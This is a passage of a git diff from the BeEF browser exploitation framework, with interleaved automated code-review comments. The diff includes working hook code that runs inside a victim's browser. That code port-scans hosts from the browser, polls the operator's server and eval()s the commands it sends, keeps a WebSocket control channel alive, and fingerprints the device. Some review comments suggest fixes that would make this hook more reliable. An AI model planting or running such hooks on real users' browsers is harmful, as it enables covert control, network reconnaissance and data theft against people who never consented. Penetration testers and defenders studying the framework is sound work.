A mod of pdp's scanner + * + * Version: '0.1', + * author: 'Petko Petkov', + * homepage: 'http://www.gnucitizen.org' + */ + +beef.net.portscanner = { + + scanPort: function(callback, target, port, timeout) + { + var timeout = (timeout == null)?100:timeout; + var img = new Image(); + + img.onerror = function () { + if (!img) return; + img = undefined; + callback(target, port, 'open'); + }; + + img.onload = img.onerror; + + img.src = 'http://' + target + ':' + port; + + setTimeout(function () { + if (!img) return; + img = undefined; + callback(target, port, 'closed'); + }, timeout); + + }, + + scanTarget: function(callback, target, ports_str, timeout) + { + var ports = ports_str.split(","); + + for (index = 0; index < ports.length; index++) { + this.scanPort(callback, target, ports[index], timeout); + }; + + } +}; + +beef.regCmp('beef.net.portscanner'); + diff --git a/core/main/client/net/requester.js b/core/main/client/net/requester.js index 8d51128f1..ad388282e 100644 --- a/core/main/client/net/requester.js +++ b/core/main/client/net/requester.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + /*! * @literal object: beef.net.requester * 
diff --git a/core/main/client/os.js b/core/main/client/os.js index c133edcc9..f6dfae17c 100644 --- a/core/main/client/os.js +++ b/core/main/client/os.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.os = { ua: navigator.userAgent, @@ -72,7 +63,11 @@ beef.os = { isMacintosh: function() { return (this.ua.match('(Mac_PowerPC)|(Macintosh)|(MacIntel)')) ? true : false; }, - + + isWinPhone: function() { + return (this.ua.match('(Windows Phone)')) ? true : false; + }, + isIphone: function() { return (this.ua.indexOf('iPhone') != -1) ? true : false; }, @@ -97,6 +92,10 @@ beef.os = { return (this.ua.match('BlackBerry')) ? true : false; }, + isWebOS: function() { + return (this.ua.match('webOS')) ? true : false; + }, + isQNX: function() { return (this.ua.match('QNX')) ? true : false; }, @@ -139,11 +138,14 @@ beef.os = { if(this.isSunOS()) return 'Sun OS'; //iPhone - if (this.isIphone()) return 'iPhone'; + if (this.isIphone()) return 'iOS'; //iPad - if (this.isIpad()) return 'iPad'; + if (this.isIpad()) return 'iOS'; //iPod - if (this.isIpod()) return 'iPod'; + if (this.isIpod()) return 'iOS'; + + // zune + //if (this.isZune()) return 'Zune'; //macintosh if(this.isMacintosh()) { 
@@ -156,6 +158,7 @@ beef.os = { //others if(this.isQNX()) return 'QNX'; if(this.isBeOS()) return 'BeOS'; + if(this.isWebOS()) return 'webOS'; return 'unknown'; } diff --git a/core/main/client/session.js b/core/main/client/session.js index 040cf81a6..8dc4e6a8d 100644 --- a/core/main/client/session.js +++ b/core/main/client/session.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + /*! * @literal object: beef.session * @@ -77,26 +68,7 @@ beef.session = { } return hook_session_id; - }, - - /** - * Overrides each link, and creates an iframe (loading the href) instead of following the link - */ - persistent: function() { - $j('a').click(function(e) { - if ($j(this).attr('href') != '') - { - e.preventDefault(); - beef.dom.createIframe('fullscreen', 'get', {'src':$j(this).attr('href')}, {}, null); - $j(document).attr('title', $j(this).html()); - document.body.scroll = "no"; - document.documentElement.style.overflow = 'hidden'; - } - }); } - - - }; beef.regCmp('beef.session'); diff --git a/core/main/client/timeout.js b/core/main/client/timeout.js new file mode 100644 index 000000000..43d875f97 --- /dev/null +++ b/core/main/client/timeout.js 
@@ -0,0 +1,17 @@
+//
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+/*
+ Sometimes there are timing issues and looks like beef_init
+ is not called at all (always in cross-domain situations,
+ for example calling the hook with jquery getScript,
+ or sometimes with event handler injections).
+
+ To fix this, we call again beef_init after 1 second.
+ Cheers to John Wilander that discussed this bug with me at OWASP AppSec Research Greece
+ antisnatchor
+ */
+setTimeout(beef_init, 1000);
\ No newline at end of file
diff --git a/core/main/client/updater.js b/core/main/client/updater.js
index 4987de6f8..912e64b16 100644
--- a/core/main/client/updater.js
+++ b/core/main/client/updater.js
@@ -1,29 +1,20 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + /*! * @Literal object: beef.updater * * Object in charge of getting new commands from the BeEF framework and execute them. + * The XHR-polling channel is managed here. If WebSockets are enabled, + * websocket.ls is used instead. */ beef.updater = { - // Low timeouts combined with the way the framework sends commamd modules result - // in instructions being sent repeatedly or complex code. - // If you suffer from ADHD, you can decrease this setting. - timeout: 5000, + // XHR-polling timeout. + xhr_poll_timeout: "<%= @xhr_poll_timeout %>", // A lock. lock: false, 
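Review bot: `xhr_poll_timeout` is now a quoted template value, so the delay reaches `setTimeout` (in the `check` hunk that follows) as a string; if the template ever renders empty or non-numeric, the delay coerces to 0 and `check` re-arms itself without any pause. `xhr_poll_timeout: parseInt("<%= @xhr_poll_timeout %>", 10) || 5000,` keeps the value numeric and falls back to the previous 5000 ms; how the server renders this value is not visible here. The new header comment also refers to `websocket.ls`, which looks like a typo for `websocket.js`.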
@@ -51,22 +42,22 @@ beef.updater = { beef.net.flush(); if(beef.commands.length > 0) { this.execute_commands(); - } - - else { + }else { this.get_commands(); /*Polling*/ } } // ( typeof beef.websocket === "undefined") - setTimeout("beef.updater.check();", beef.updater.timeout); + setTimeout("beef.updater.check();", beef.updater.xhr_poll_timeout); }, - // Gets new commands from the framework. - get_commands: function(http_response) { + /** + * Gets new commands from the framework. + */ + get_commands: function() { try { this.lock = true; - beef.net.request('http', 'GET', beef.net.host, beef.net.port, beef.net.hook, null, 'BEEFHOOK='+beef.session.get_hook_session_id(), 1, 'script', function(response) { + beef.net.request(beef.net.httpproto, 'GET', beef.net.host, beef.net.port, beef.net.hook, null, 'BEEFHOOK='+beef.session.get_hook_session_id(), 5, 'script', function(response) { if (response.body != null && response.body.length > 0) beef.updater.execute_commands(); }); @@ -77,13 +68,12 @@ beef.updater = { this.lock = false; }, - // Executes the received commands if any. + /** + * Executes the received commands, if any. + */ execute_commands: function() { if(beef.commands.length == 0) return; - this.lock = true; - /*here execute the command */ - while(beef.commands.length > 0) { command = beef.commands.pop(); try { @@ -92,7 +82,6 @@ beef.updater = { console.error('execute_commands - command failed to execute: ' + e.message); } } - this.lock = false; } }; diff --git a/core/main/client/websocket.js b/core/main/client/websocket.js index 25ccdeeba..796980990 100644 --- a/core/main/client/websocket.js +++ b/core/main/client/websocket.js 
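Review bot: `setTimeout("beef.updater.check();", beef.updater.xhr_poll_timeout)` passes a string, which the browser compiles as code on every tick; `setTimeout(function () { beef.updater.check(); }, beef.updater.xhr_poll_timeout);` does the same without string evaluation, and the same form appears in `beef.websocket.alive` in websocket.js. In `get_commands`, `this.lock = false` (the first context line of the second hunk) appears to run as soon as the asynchronous request is issued, before its callback fires, and the second hunk removes the lock from `execute_commands` altogether. A short comment on what `lock` is still meant to protect would help; the lines between the two hunks are not visible.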
@@ -1,72 +1,90 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // -//beef.websocket.socket.send(take answer to server beef) -/*New browser init call this */ + +/** + * @Literal object: beef.websocket + * + * Manage the WebSocket communication channel. + * This channel is much faster and responsive, and it's used automatically + * if the browser supports WebSockets AND beef.http.websocket.enable = true. + */ beef.websocket = { socket:null, - alive_timer:<%= @websocket_timer %>, + ws_poll_timeout: "<%= @ws_poll_timeout %>", + /** + * Initialize the WebSocket client object. + * Note: use WebSocketSecure only if the hooked domain is under https. + * Mixed-content in WS is quite different from a non-WS context. 
+ */ init:function () { var webSocketServer = beef.net.host; - var webSocketPort = <%= @websocket_port %>; - var webSocketSecure = <%= @websocket_secure %>; + var webSocketPort = "<%= @websocket_port %>"; + var webSocketSecure = "<%= @websocket_secure %>"; var protocol = "ws://"; - if(webSocketSecure) + if(webSocketSecure && window.location.protocol=="https:"){ protocol = "wss://"; + webSocketPort= "<%= @websocket_sec_port %>"; + } if (beef.browser.isFF() && !!window.MozWebSocket) { beef.websocket.socket = new MozWebSocket(protocol + webSocketServer + ":" + webSocketPort + "/"); - - } else { + }else{ beef.websocket.socket = new WebSocket(protocol + webSocketServer + ":" + webSocketPort + "/"); } }, - /* send Helo message to the BeEF server and start async communication*/ + + /** + * Send Helo message to the BeEF server and start async polling. + */ start:function () { new beef.websocket.init(); this.socket.onopen = function () { - //console.log("Socket has been opened!"); - - /*send browser id*/ beef.websocket.send('{"cookie":"' + beef.session.get_hook_session_id() + '"}'); - //console.log("Connected and Helo"); beef.websocket.alive(); - } + }; + this.socket.onmessage = function (message) { - //console.log("Received message via WS."+ message.data); + //todo: double-check if there is a way to don't use eval here. It's not a big deal, + //todo: because the eval'ed data comes from BeEF itself, so is implicitly trusted. eval(message.data); - } + }; + this.socket.onclose = function () { + setTimeout(function(){beef.websocket.start()}, 5000); + }; }, + /** + * Send data back to BeEF. This is basically the same as beef.net.send, + * but doesn't queue commands. 
+ * Example usage: + * beef.websocket.send('{"handler" : "' + handler + '", "cid" :"' + cid + + * '", "result":"' + beef.encode.base64.encode(beef.encode.json.stringify(results)) + + * '","callback": "' + callback + '","bh":"' + beef.session.get_hook_session_id() + '" }'); + */ send:function (data) { - this.socket.send(data); -// console.log("Sent [" + data + "]"); + try { + this.socket.send(data); + }catch(err){} }, + /** + * Polling mechanism, to notify the BeEF server that the browser is still hooked, + * and the WebSocket channel still alive. + * todo: there is probably a more efficient way to do this. Double-check WebSocket API. + */ alive: function (){ beef.websocket.send('{"alive":"'+beef.session.get_hook_session_id()+'"}'); -// console.log("sent alive"); - setTimeout("beef.websocket.alive()", beef.websocket.alive_timer); - + setTimeout("beef.websocket.alive()", beef.websocket.ws_poll_timeout); } }; diff --git a/core/main/command.rb b/core/main/command.rb index 577cd39d6..3ebd42497 100644 --- a/core/main/command.rb +++ b/core/main/command.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF diff --git a/core/main/configuration.rb b/core/main/configuration.rb index f2469e0f4..045dd9f62 100644 
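Review bot: `webSocketSecure` is now the quoted string `"<%= @websocket_secure %>"`, and any non-empty string is truthy in JavaScript, so if the template renders `false` the test `webSocketSecure && window.location.protocol=="https:"` still passes on every https page. Comparing explicitly, `if (webSocketSecure === "true" && window.location.protocol === "https:") {`, restores the configured switch (assuming the server renders `true`/`false`). Separately, the todo on `onmessage` treats the `eval`'ed frames as trusted because they come from the server, but that only holds when the channel is `wss://`; over plain `ws://` nothing protects frame integrity, and the comment should say so. `send` also swallows every exception in an empty `catch`, so data sent on a closed socket is dropped silently; logging the error or falling back to the queue would make that visible.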
--- a/core/main/configuration.rb +++ b/core/main/configuration.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF diff --git a/core/main/console/banners.rb b/core/main/console/banners.rb index 3621d20e9..bdf2c72fa 100644 --- a/core/main/console/banners.rb +++ b/core/main/console/banners.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Core 
@@ -40,12 +30,13 @@ module Banners def print_welcome_msg config = BeEF::Core::Configuration.instance version = config.get('beef.version') - print_info "Browser Exploitation Framework (BeEF)" - data = "Version #{version}\n" - data += "Website http://beefproject.com\n" - data += "Run 'beef -h' for basic help.\n" - data += "Run 'git pull' to update to the latest revision." + print_info "Browser Exploitation Framework (BeEF) #{version}" + data = "Twit: @beefproject\n" + data += "Site: http://beefproject.com\n" + data += "Blog: http://blog.beefproject.com\n" + data += "Wiki: https://github.com/beefproject/beef/wiki\n" print_more data + print_info "Project Creator: " + "Wade Alcorn".red + " (@WadeAlcorn)" end # @@ -89,12 +80,13 @@ module Banners def print_network_interfaces_routes configuration = BeEF::Core::Configuration.instance + prototxt = configuration.get("beef.http.https.enable") == true ? "https" : "http" self.interfaces.map do |host| # display the important URLs on each interface from the interfaces array print_success "running on network interface: #{host}" beef_host = configuration.get("beef.http.public_port") || configuration.get("beef.http.port") - data = "Hook URL: http://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.hook_file")}\n" - data += "UI URL: http://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.panel_path")}\n" + data = "Hook URL: #{prototxt}://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.hook_file")}\n" + data += "UI URL: #{prototxt}://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.panel_path")}\n" print_more data end 
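Review bot: In print_network_interfaces_routes, `beef_host` is assigned from `beef.http.public_port` (falling back to `beef.http.port`), but the rewritten "Hook URL" and "UI URL" lines never use it and interpolate `beef.http.port` directly. The local is therefore dead, and its name suggests a host while it holds a port. Either drop the assignment or rename it, e.g. `beef_port = configuration.get("beef.http.public_port") || configuration.get("beef.http.port")`, and use that in both URLs. The new local `prototxt` would read more clearly as `scheme`, and `== true ? "https" : "http"` deserves a short comment saying that any non-true value falls back to plain HTTP. The method starts and ends outside this hunk.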
@@ -105,13 +97,12 @@ module Banners # def print_loaded_extensions extensions = BeEF::Extensions.get_loaded - print_info "#{extensions.size} extensions loaded:" + print_info "#{extensions.size} extensions enabled." output = '' - - - extensions.each do |key,ext| - output += "#{ext['name']}\n" - end + + #extensions.each do |key,ext| + # output += "#{ext['name']}\n" + #end print_more output end diff --git a/core/main/console/commandline.rb b/core/main/console/commandline.rb index 1ad2fa025..7a06c52f9 100644 --- a/core/main/console/commandline.rb +++ b/core/main/console/commandline.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Core diff --git a/core/main/constants/browsers.rb b/core/main/constants/browsers.rb index d43e156e5..e707d67e9 100644 --- a/core/main/constants/browsers.rb +++ b/core/main/constants/browsers.rb 
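Review bot: The extension-name loop in print_loaded_extensions is commented out rather than deleted, which leaves `output = ''` and `print_more output` emitting an empty string after the count line. If the per-extension listing is no longer wanted, remove the three commented lines together with `output` and the `print_more` call. If it should remain available, gate it behind a debug or verbose setting instead of a comment, so the operator can still see which extensions are active.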
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF diff --git a/core/main/constants/commandmodule.rb b/core/main/constants/commandmodule.rb index d37cc1169..ce0f6c807 100644 --- a/core/main/constants/commandmodule.rb +++ b/core/main/constants/commandmodule.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF diff --git a/core/main/constants/distributedengine.rb b/core/main/constants/distributedengine.rb index ddbf8426f..8da3eb63f 100644 
--- a/core/main/constants/distributedengine.rb +++ b/core/main/constants/distributedengine.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF diff --git a/core/main/constants/hardware.rb b/core/main/constants/hardware.rb new file mode 100644 index 000000000..272cf3396 --- /dev/null +++ b/core/main/constants/hardware.rb 
@@ -0,0 +1,79 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# + +module BeEF +module Core +module Constants + + # @note The hardware's strings for hardware detection. + module Hardware + + HW_UNKNOWN_IMG = 'pc.png' + HW_IPHONE_UA_STR = 'iPhone' + HW_IPHONE_IMG = 'iphone.jpg' + HW_IPAD_UA_STR = 'iPad' + HW_IPAD_IMG = 'ipad.png' + HW_IPOD_UA_STR = 'iPod' + HW_IPOD_IMG = 'ipod.jpg' + HW_BLACKBERRY_UA_STR = 'BlackBerry' + HW_BLACKBERRY_IMG = 'blackberry.png' + HW_WINPHONE_UA_STR = 'Windows Phone' + HW_WINPHONE_IMG = 'win.png' + HW_ZUNE_UA_STR = 'ZuneWP7' + HW_ZUNE_IMG = 'zune.gif' + HW_KINDLE_UA_STR = 'Kindle' + HW_KINDLE_IMG = 'kindle.png' + HW_NOKIA_UA_STR = 'Nokia' + HW_NOKIA_IMG = 'nokia.ico' + HW_HTC_UA_STR = 'HTC' + HW_HTC_IMG = 'htc.ico' + HW_MOTOROLA_UA_STR = 'motorola' + HW_MOTOROLA_IMG = 'motorola.png' + HW_GOOGLE_UA_STR = 'Nexus One' + HE_GOOGLE_IM = 'nexus.png' + HW_ERICSSON_UA_STR = 'Ericsson' + HW_ERICSSON_IMG = 'sony_ericsson.png' + HW_ALL_UA_STR = 'All' + + # Attempt to match operating system string to constant + # @param [String] name Name of operating system + # @return [String] Constant name of matched operating system, returns 'ALL' if nothing are matched + def self.match_hardware(name) + case name.downcase + when /iphone/ + HW_IPHONE_UA_STR + when /ipad/ + HW_IPAD_UA_STR + when /ipod/ + HW_IPOD_UA_STR + when /blackberry/ + HW_BLACKBERRY_UA_STR + when /windows phone/ + HW_WINPHONE_UA_STR + when /zune/ + HW_ZUNE_UA_STR + when /kindle/ + HW_KINDLE_UA_STR + when /nokia/ + HW_NOKIA_UA_STR + when /motorola/ + HW_MOTOROLA_UA_STR + when /htc/ + HW_HTC_UA_STR + when /google/ + HW_GOOGLE_UA_STR + when /ericsson/ + HW_ERICSSON_UA_STR + else + 'ALL' + end + end + + end + +end +end +end diff --git a/core/main/constants/os.rb b/core/main/constants/os.rb index 2e86f1e39..7c932f17d 100644 --- a/core/main/constants/os.rb 
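Review bot: `HE_GOOGLE_IM = 'nexus.png'` breaks the `HW_<NAME>_IMG` naming used by every other constant in the new module, so a reference to `HW_GOOGLE_IMG` would raise NameError; the line should read `HW_GOOGLE_IMG = 'nexus.png'`. In match_hardware, `when /google/` cannot match the string stored in `HW_GOOGLE_UA_STR` ('Nexus One'), so `when /nexus/, /google/` looks like what was intended. The doc comment above match_hardware was copied from the OS module and still says "operating system"; it should describe hardware names. `name.downcase` raises on nil, so either document that the caller must pass a String or use `name.to_s.downcase`.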
+++ b/core/main/constants/os.rb 
@@ -1,89 +1,78 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF -module Core -module Constants - - # @note The OS'es strings for os detection. - module Os - - OS_UNKNOWN_IMG = 'unknown.png' - OS_WINDOWS_UA_STR = 'Windows' - OS_WINDOWS_IMG = 'win.png' - OS_LINUX_UA_STR = 'Linux' - OS_LINUX_IMG = 'linux.png' - OS_MAC_UA_STR = 'Mac' - OS_MAC_IMG = 'mac.png' - OS_QNX_UA_STR = 'QNX' - OS_QNX_IMG = 'qnx.ico' - OS_BEOS_UA_STR = 'BeOS' - OS_BEOS_IMG = 'beos.png' - OS_OPENBSD_UA_STR = 'OpenBSD' - OS_OPENBSD_IMG = 'openbsd.ico' - OS_IPHONE_UA_STR = 'iPhone' - OS_IPHONE_IMG = 'iphone.png' - OS_IPAD_UA_STR = 'iPad' - OS_IPAD_IMG = 'ipad.png' - OS_IPOD_UA_STR = 'iPod' - OS_IPOD_IMG = 'ipod.jpg' - OS_MAEMO_UA_STR = 'Maemo' - OS_MAEMO_IMG = 'maemo.ico' - OS_BLACKBERRY_UA_STR = 'BlackBerry' - OS_BLACKBERRY_IMG = 'blackberry.png' - OS_ANDROID_UA_STR = 'Android' - OS_ANDROID_IMG = 'android.png' - OS_ALL_UA_STR = 'All' + module Core + module Constants + + # @note The OS'es strings for os detection. 
+ module Os + + OS_UNKNOWN_IMG = 'unknown.png' + OS_WINDOWS_UA_STR = 'Windows' + OS_WINDOWS_IMG = 'win.png' + OS_LINUX_UA_STR = 'Linux' + OS_LINUX_IMG = 'linux.png' + OS_MAC_UA_STR = 'Mac' + OS_MAC_IMG = 'mac.png' + OS_QNX_UA_STR = 'QNX' + OS_QNX_IMG = 'qnx.ico' + OS_BEOS_UA_STR = 'BeOS' + OS_BEOS_IMG = 'beos.png' + OS_OPENBSD_UA_STR = 'OpenBSD' + OS_OPENBSD_IMG = 'openbsd.ico' + OS_IOS_UA_STR = 'iOS' + OS_IOS_IMG = 'ios.png' + OS_IPHONE_UA_STR = 'iPhone' + OS_WEBOS_UA_STR = 'webos.png' + OS_IPHONE_IMG = 'iphone.jpg' + OS_IPAD_UA_STR = 'iPad' + OS_IPAD_IMG = 'ipad.png' + OS_IPOD_UA_STR = 'iPod' + OS_IPOD_IMG = 'ipod.jpg' + OS_MAEMO_UA_STR = 'Maemo' + OS_MAEMO_IMG = 'maemo.ico' + OS_BLACKBERRY_UA_STR = 'BlackBerry' + OS_BLACKBERRY_IMG = 'blackberry.png' + OS_ANDROID_UA_STR = 'Android' + OS_ANDROID_IMG = 'android.png' + OS_ALL_UA_STR = 'All' # Attempt to match operating system string to constant # @param [String] name Name of operating system # @return [String] Constant name of matched operating system, returns 'ALL' if nothing are matched - def self.match_os(name) - case name.downcase - when /win/ - OS_WINDOWS_UA_STR - when /lin/ - OS_LINUX_UA_STR - when /os x/, /osx/, /mac/ - OS_MAC_UA_STR - when /qnx/ - OS_QNX_UA_STR - when /beos/ - OS_BEOS_UA_STR - when /openbsd/ - OS_OPENBSD_UA_STR - when /iphone/ - OS_IPHONE_UA_STR - when /ipad/ - OS_IPAD_UA_STR - when /ipod/ - OS_IPOD_UA_STR - when /maemo/ - OS_MAEMO_UA_STR - when /blackberry/ - OS_BLACKBERRY_UA_STR - when /android/ - OS_ANDROID_UA_STR - else - 'ALL' - end - end - + def self.match_os(name) + case name.downcase + when /win/ + OS_WINDOWS_UA_STR + when /lin/ + OS_LINUX_UA_STR + when /os x/, /osx/, /mac/ + OS_MAC_UA_STR + when /qnx/ + OS_QNX_UA_STR + when /beos/ + OS_BEOS_UA_STR + when /openbsd/ + OS_OPENBSD_UA_STR + when /ios/, /iphone/, /ipad/, /ipod/ + OS_IOS_UA_STR + when /maemo/ + OS_MAEMO_UA_STR + when /blackberry/ + OS_BLACKBERRY_UA_STR + when /android/ + OS_ANDROID_UA_STR + else + 'ALL' + end + end + + end 
+ + end end - -end -end end diff --git a/core/main/crypto.rb b/core/main/crypto.rb index ae81ae5e6..cfce1054a 100644 --- a/core/main/crypto.rb +++ b/core/main/crypto.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF diff --git a/core/main/distributed_engine/models/rules.rb b/core/main/distributed_engine/models/rules.rb index 